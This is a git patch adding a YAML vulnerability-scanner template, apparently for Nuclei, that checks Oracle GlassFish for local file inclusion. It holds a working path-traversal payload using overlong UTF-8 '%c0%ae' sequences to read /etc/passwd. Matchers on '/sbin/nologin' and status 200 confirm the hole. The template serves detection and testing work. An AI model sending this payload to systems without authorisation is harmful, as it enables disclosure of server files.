From 35e0b8e2f4908d559b421e8cbd6b050117cdfb44 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 16 Feb 2021 08:38:42 +0000
Subject: [PATCH 1/2] Create oracle-glassfish-lfi.yaml

---
 .../oracle/oracle-glassfish-lfi.yaml          | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 vulnerabilities/oracle/oracle-glassfish-lfi.yaml

diff --git a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
new file mode 100644
index 0000000000..2735531047
--- /dev/null
+++ b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
@@ -0,0 +1,22 @@
+id: glassfish-lfi
+
+info:
+ name: GlassFish LFI
+ author: pikpikcu
+ severity: high
+ tags: oracle,lfi
+
+requests:
+ - method: GET
+   path:
+    - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+   matchers-condition: and
+   matchers:
+    - type: word
+      words:
+       - "/sbin/nologin"
+      part: body
+
+    - type: status
+      status:
+       - 200

From b38e84957eff123e4c900dc7e43b7a7b67f9444e Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 16 Feb 2021 08:41:11 +0000
Subject: [PATCH 2/2] Update oracle-glassfish-lfi.yaml

---
 vulnerabilities/oracle/oracle-glassfish-lfi.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
index 2735531047..65df4b4800 100644
--- a/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
+++ b/vulnerabilities/oracle/oracle-glassfish-lfi.yaml
@@ -4,6 +4,7 @@ info:
  name: GlassFish LFI
  author: pikpikcu
  severity: high
+ reference: https://www.exploit-db.com/exploits/39241
  tags: oracle,lfi
 
 requests: